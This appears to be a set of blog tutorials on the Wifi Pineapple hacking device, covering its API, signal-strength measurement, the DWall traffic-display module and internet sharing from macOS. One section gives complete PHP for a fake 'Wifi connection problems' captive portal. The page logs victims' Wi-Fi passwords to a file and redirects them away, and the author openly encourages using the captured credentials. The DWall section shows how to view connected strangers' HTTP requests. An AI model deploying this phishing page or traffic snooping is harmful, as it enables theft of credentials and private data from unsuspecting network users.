Introduction into Wifi Pineapple API

After short time you might come to the idea to control your Wifi Pineapple via terminal only. Luckily the developers provided an API. There is already a Python wrapper available. But why not easily using curl and jq?

Objective

Learn how to setup and use (via curl) the Wifi Pineapple API.

Precondition

jq installed (latest)

Preparation

If not done already, you need to create a API token. To do so, open “Advanced” section – insert a token name and press button “Generate”.

Wifi Pineapple generate API token

The curl commands can be very long and unhandy. To make it a little easier to use, you should save and use the very long token (and header) as a variables ($TOKEN and $HEADER).

# create token variable
$ TOKEN="458aef505b17d0e954f95419c8da0df1047529708787bb04b15362bc3ecaa6e19e22d8bf2378293275c0e9ce6af62ef0e00691ec24aaa7309e6b9923067177af"

$ HEADER='-H "Content-type: application/json"'

# create a first simple nothification
$ curl -s -X POST  $HEADER -d '{"system": "notifications", "action": "addNotification", "message": "my first notification", "apiToken": "'$TOKEN'"}' http://192.168.2.10:1471/api/

As the Wifi Pineapple use an well known prefix we cannot use jq directly! So we need to remove the prefix from our output. Now create a new variable and pipe the output through sed. In my case the following characters are used as response prefix “)]}’,“.

# create prefix variable
$ PREF=")]}',"

# create a second simple nothification (incl. sed and jq)
$ curl -s -X POST  $HEADER -d '{"system": "notifications", "action": "addNotification", "message": "my second notification", "apiToken": "'$TOKEN'"}' http://192.168.2.10:1471/api/ | sed -e "s/^$PREF//" | jq .

If everything was working well, the terminal output will be pretty-printed (via jq) and you should be able to see both notifications (Browser UI).

Wifi Pineapple notifications via API

API examples

The online API documentation is very good described. However, to give you a better start, a few examples are shown below.

# get current version of Wifi Pineapple
$ curl -s -X POST $HEADER -d '{"module": "Advanced", "action": "getCurrentVersion", "apiToken": "'$TOKEN'"}' http://192.168.2.10:1471/api/ | sed -e "s/^$PREF//" | jq .

# get current time zone of Pineapple
$ curl -s -X POST $HEADER -d '{"module": "Configuration", "action": "getCurrentTimeZone", "apiToken": "'$TOKEN'"}' http://192.168.2.10:1471/api/ | sed -e "s/^$PREF//" | jq .

# check available module storages
$ curl -s -X POST $HEADER -d '{"module": "ModuleManager", "action": "checkDestination", "apiToken": "'$TOKEN'"}' http://192.168.2.10:1471/api/ | sed -e "s/^$PREF//" | jq .

# get installed modules
$ curl -s -X POST $HEADER -d '{"module": "ModuleManager", "action": "getInstalledModules", "apiToken": "'$TOKEN'"}' http://192.168.2.10:1471/api/ | sed -e "s/^$PREF//" | jq .

I think you’ve got it. In similar way you can use the API for “Recon”, “Logging”, “Networking” and so on.

Understand and measure signal strength with Wifi Pineapple

It’s a long title for a tutorial this time. Don’t worry I will try my best to make it short and understandable. Many people wonder why there penetration of Wifi networks not really works and forget about an very important point: “Wifi Signal Strength”. But what is it? How can I measure it? Do I need to buy expensive software? Here a try to enlighten you. For this explanation I will use the Wifi Pineapple device with some command line tools and a nice UI module.

Objectiv

Understand the basics of Wifi Signal Strength and learn how to measure it.

Precondition

Wifi Pineapple device incl. SSH connection into it plus internet connection (to download the module).

The basics

The WiFi signal strength is given as the logarithmic (not linear) unit of measurement of the power dBm. Decibels are relative to milliwatts and are expressed as a negative number from 0 to -100. For example, a signal value of -50 is much stronger than a signal value of -70. A difference of 3 dBm is therefore halving or doubling the strength of the previous value. The following table should give some information about the values.

Signal strengthQualityDescription
-30 dBmExcellentOne of the best values ​​that can be achieved.
-50 dBmGoodAn very good signal level which allows all applications in the network.
-70 dBmAcceptableNot a good value, there are already severe application problems.
-90 dBmVery badVery bad value, there is usually no connection here.

The measurement

Now let’s get to the measurement quickly. Start the Wifi Pineapple and connect.

# SSH into Wifi Pineapple device
$ ssh root@192.168.2.10

Let’s take a look at the values ​​of the wifi devices themselves (these will be different).

# show statistics on each wireless interface in the system
$ cat /proc/net/wireless

# show interface configuration with ifconfig
$ ifconfig wlan0
$ ifconfig wlan1

# show interface configuration with iwconfig
$ iwconfig wlan0
$ iwconfig wlan1

Now we scan the Wifi’s and have the values ​​displayed (repeat this multiple times to get the average).

# use iwlist to scan (old way)
$ iwlist wlan0 scanning | egrep -i 'SSID|Quality'

# use iw to scan (modern way)
$ iw wlan0 scan | egrep -i 'SSID|signal'

Make it more visible

Under the Wifi Pineapple modules you can search for “SignalStrength” and install it. After successful installation, select the module then select one of your available wifi interfaces and press button “Scan”.

Wifi Pineapple module SignalStrength scan

After short time you will have outputs as table and graph.

Signal Level Graph

That’s it already. With these basics, you should be able to understand and perform your wifi penetration tests even better.

Wifi Pineapple Module DWall

This is the first tutorial about Wifi Pineapple modules. I will start with a simple one called DWall. With this module you can gather and display easily live informations from connected clients wich using the HTTP protocol.

Objective

Installation and usage of module DWall on the Wifi Pineapple.

Precondition

Your Wifi Pineapple need to have an internet connection.

Installation

This time we will use the browser UI for the installation. Let’s start… Look for DWall among the available modules, click the “Install” button and select the location (you should always select the SD card, if available).

DWall installation on Wifi Pineapple

Via Terminal you can verify the installation, too.

# list installed modules on sdcard folder
$ ssh root@192.168.2.10 -C 'ls -la /sd/modules/'

Usage

After successful installation (which should be quite fast), select the module. Now activate it and start the listener. As soon as a connected client makes requests with HTTP, you will see them in the module output. Depending on the responce, also other data such as pictures.

DWall report on Wifi Pineapple UI

Now the last one should also understand why encryption (HTTPS) is so important! Even if it is already used a lot, you will figure that many websites still work without encryption.

Create landing pages for Wifi Pineapple

With the Wifi Pineapple from Hak5 you can create “Landing Pages” in few minutes. With some luck people insert their they credentials and you can use them. In this tutorial I will explain how easy this can be done without any extra modules installed (like Evil Portal and so on).

Objectives

Only with standard features we setup a captive portal (for the http protocol) in which we can try to collect credentials.

Precondition

To use the “Landing Page” feature of your Wifi Pineapple, you need a working internet connection on the device. In this tutorial you can learn how to do this for macOS.

Prepare and test locally

Before you write the code directly on the device, I recommend to code and and test it locally. This section will explain how.

# create project
$ mkdir -p ~/Projects/LandingPage

# change directory
$ cd ~/Projects/LandingPage

# create PHP file
$ vim index.php

# test with PHP built-in Web Server
$ php -S localhost:8000
<?php
// Landing page configuration
$SSID = 'ExampleSSID';

// Landing page content
if (isset($_POST['wifi_password']) && !empty(trim($_POST['wifi_password']))) {
  $data = $SSID . ':' . htmlspecialchars(trim($_POST['wifi_password'])) . "\n";
  file_put_contents('/tmp/wifi-passwords.txt', $data, FILE_APPEND | LOCK_EX);
  header("Location: https://google.com");
} else {
  echo '<!DOCTYPE HTML><html lang="en-US"><head>';
  echo '<title>' . $SSID . ' Connection Failure</title>';
  echo '<meta charset="utf-8">';
  echo '<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">';
  echo '<meta name="generator" content="' . $SSID . '">';
  echo '<style>';
  echo 'html, body {';
  echo '  font-family: Helvetica, sans-serif;';
  echo '  background: #f3f2f2;';
  echo '}';
  echo 'h1 {';
  echo ' padding-bottom: 20px;';
  echo ' border-bottom: 1px solid #eee;';
  echo ' font-size: 25px;';
  echo ' color: #4288CC;';
  echo '}';
  echo 'p {';
  echo ' margin-bottom: 20px;';
  echo ' padding-bottom: 20px;';
  echo ' font-size: 15px;';
  echo ' color: #777;';
  echo ' border-bottom: 1px solid #eee;';
  echo '}';
  echo 'input {';
  echo ' padding: 5px;';
  echo '}';
  echo '.center {';
  echo '  margin: 150px auto auto auto;';
  echo '  padding: 20px;';
  echo '  width: 450px;';
  echo '  text-align: center;';
  echo '  border: 1px solid #ccc;';
  echo '  border-radius: 5px;';
  echo '  background: #fff;';
  echo '  box-shadow: 4px 4px 5px 0px rgba(50, 50, 50, 0.75);';
  echo '}';
  echo '</style></head>';
  echo '<div class="center">';
  echo '<h1>Wifi connection problems</h1>';
  echo '<p>Please enter your password for "' . $SSID . '" <br> and press "Reconnect" to solve this issue.</p>';
  echo '<form method="POST" action="' . htmlspecialchars($_SERVER["PHP_SELF"]) . '">';
  echo '<input type="password" name="wifi_password" size="35" maxlength="65"> ';
  echo '<input type="submit" name="submit" value="Reconnect">';
  echo '</form></div></html>';
}

Open your Browser and use the URL http://localhost:8000. You can go back to your favorite editor and work on it. After you’re done press Ctrl-C to quit the build-in server.

Create Landing Page on Wifi Pineapple

Connect in your Browser to the Wifi Pineapple device, login and copy/paste the php code into “Landing Page” textarea. Save and enable the feature.

Wifi Pineapple Landing Page configuration.

Here a picture from my iPad after joining the wifi network.

Fake captive portal from Pineapple

If you read the PHP code, you will see that all informations are stored into file wifi-passwords.txt.

# SSH into pineapple
$ ssh root@<wifi pineapple ip>

# read gathered informations
$ cat /tmp/wifi-passwords.txt

# or tail
$ tail -f /tmp/wifi-passwords.txt

Note: You can extend the code to gather the username and password (incl. checkbox for acceptable use policy) where users of public-access network are obliged to view and interact with before access is granted (like hotels, airports, etc.).

Share internet from macOS to Wifi Pineapple

I have been using the Wifi Pineapple Nano by Hak5 for a long time. What can I say – very, very cool tiny device. Since I am also a macOS user, I would like to show in this tutorial how I share my internet (Wifi to USB). There are various options but with this I have currently achieved the best results.

Important: You should carry out all firmware upgrades beforehand, since the settings (which I will show you soon) will be overwritten again.

Objectives

I would like to connect my Macbook to the Internet via WiFi and then make it available to the Wifi Pineapple via USB. So here both devices should be able to use the Internet without network conflicts.

Change Wifi Pineapple network

# show interface configuration (optional)
$ ifconfig

# connect to Pineapple device via SSH
$ ssh root@172.16.42.1

# backup network file
$ cp /etc/config/network /etc/config/network.bak

# show all settings (optional)
$ uci show

# show network settings (optional)
$ uci show network

# change ip with UCI configuration tool
$ uci set network.lan.ipaddr='192.168.2.10'

# change gateway with UCI configuration tool
$ uci set network.lan.gateway='192.168.2.1'

# save changes
$ uci commit

# reboot device
$ reboot

The first steps of the configuration have been carried out. However, you still cannot connect to the device or share the internet!

Modify macOS network configuration

Now you have to configure the macos network dhcp with manual address (network.lan.gateway 192.168.2.1). To do this, open the network settings and select the Wifi Pineapple (AX88x72A). Select “DHCP with manual address” in the dropdown and assign the IP (next to Configure IPv4).

Configure device as DHCP with manual address.

You should also change the arrangement of your available network connections (devices). Click the gear icon and select “Set Service Order”. At the top should be the standard wifi followed by Wifi Pineapple.

set service order

After a short time, the settings should have been accepted.

Wifi to USB internet sharing

Now we are making the internet available from Wifi to Wifi Pineapple (USB). Launch Internet Sharing under System Preferences. On “Share your connection from” select the Wifi and on “To computers using” select the Wifi Pineapple.

share internet from Wifi to USB

Done … let’s verify all configurations.

# show interface configuration (optional)
$ ifconfig

# connect to Pineapple via SSH
$ ssh root@192.168.2.10

# run simple ping (optional)
$ ping -c 1 google.com

# exit SSH connection to Pineapple
$ exit

# open browser
$ open http://192.168.2.10:1471

Note: The Browser URL is now http://192.168.2.10:1471 (network.lan.ipaddr 192.168.2.10)!

After login you can go to the Dashboard and check “Bulletins” which should show the latest news from wifipineapple.com.